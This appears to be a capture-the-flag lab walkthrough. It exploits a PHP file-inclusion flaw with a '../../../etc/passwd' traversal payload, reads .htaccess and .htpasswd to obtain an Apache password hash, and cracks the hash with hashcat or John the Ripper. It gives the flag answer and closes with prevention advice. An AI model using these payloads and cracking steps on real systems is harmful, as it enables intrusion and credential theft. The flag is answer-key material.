Avatar

Labs / Corporate Breach

  • Daily Challenge
  • Released 08 Jul 2025
The lab needs to be started first.
Need help to start?
Daily Challenge

Corporate Breach - Complete Solution Walkthrough

Step 1: Initial Reconnaissance

  1. Access the corporate website at
  2. Explore the website structure and identify potential vulnerable parameters
  3. Look for any include or file inclusion functionality
  4. Check for common vulnerable parameters like 'page', 'file', 'include', etc.

Step 2: Identifying the Vulnerability

  1. Navigate to the 'About' page and observe the URL structure
  2. Notice the URL contains a parameter like: ?page=about
  3. Test for directory traversal by modifying the parameter
  4. Try accessing: ?page=../../../etc/passwd to test for LFI (note: this will work because the else clause doesn't append .php)
  5. If successful, you'll see system file contents

Step 3: Exploiting the Include Vulnerability

  1. Use the include vulnerability to read the .htaccess file
  2. Navigate to: ?page=admin/.htaccess
  3. This will display the .htaccess file contents
  4. Look for authentication directives and password files
  5. You should see something like:
    AuthType Basic
    AuthName "Admin Area"
    AuthUserFile /var/www/html/admin/.htpasswd
    Require valid-user

Step 4: Reading the Password File

  1. Now read the .htpasswd file using the same vulnerability
  2. Navigate to: ?page=admin/.htpasswd
  3. This will display the password hash
  4. You should see something like:
    admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/
  5. Copy the hash for cracking

Step 5: Cracking the Password Hash

  1. Use a password cracking tool like hashcat or john the ripper
  2. Installing hashcat:
    # Ubuntu/Debian:
    sudo apt-get install hashcat

    # macOS (with Homebrew):
    brew install hashcat

    # Windows:
    # Download from https://hashcat.net/hashcat/
  3. Installing john the ripper:
    # Ubuntu/Debian:
    sudo apt-get install john

    # macOS (with Homebrew):
    brew install john

    # Windows:
    # Download from https://www.openwall.com/john/
  4. Using hashcat:
    # Create a file with the hash
    echo "admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/" > hash.txt

    # Use hashcat with Apache MD5 mode (-m 1600)
    hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

    # Or with a smaller wordlist for testing
    hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/common_passwords.txt
  5. Using john the ripper:
    # Create a file with the hash
    echo "admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/" > hash.txt

    # Use john with wordlist
    john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

    # Or with a smaller wordlist for testing
    john --wordlist=/usr/share/wordlists/common_passwords.txt hash.txt
  6. Alternative: Online hash cracking
    # You can also use online tools like crackstation.net
    # Just paste the hash: $apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/
  7. Common wordlists to try: rockyou.txt, common_passwords.txt, passwords.txt
  8. For this challenge, the password is a common corporate password
  9. Important: The flag is the password you crack, not something you find in the admin panel!

Step 6: The Flag

  1. Once you successfully crack the password hash, you have the flag!
  2. The flag is the password you cracked: password123
  3. No need to access the admin panel - the password itself is the flag
  4. Submit the password as your flag

Technical Details and Security Implications

  • PHP Include Vulnerabilities: Occur when user input is directly included in file operations without proper validation
  • Directory Traversal: Allows attackers to access files outside the intended directory
  • .htaccess Protection: While useful, can be bypassed if the application has other vulnerabilities
  • Password Hash Cracking: Demonstrates the importance of strong passwords and proper hash storage
  • Defense in Depth: Multiple security layers are needed to protect sensitive areas

Prevention and Best Practices

  • Input Validation: Always validate and sanitize user input
  • Whitelist Approach: Only allow specific files to be included
  • Path Validation: Ensure included files are within allowed directories
  • Strong Authentication: Use strong passwords and consider multi-factor authentication
  • Security Headers: Implement proper security headers and access controls
  • Regular Audits: Conduct regular security assessments

Flag

The flag is: password123

Learning Objectives Achieved

  • Understanding PHP include vulnerabilities and their exploitation
  • Learning about .htaccess authentication bypass techniques
  • Practicing password hash cracking methodologies
  • Developing web application security testing skills
  • Understanding defense in depth and security layers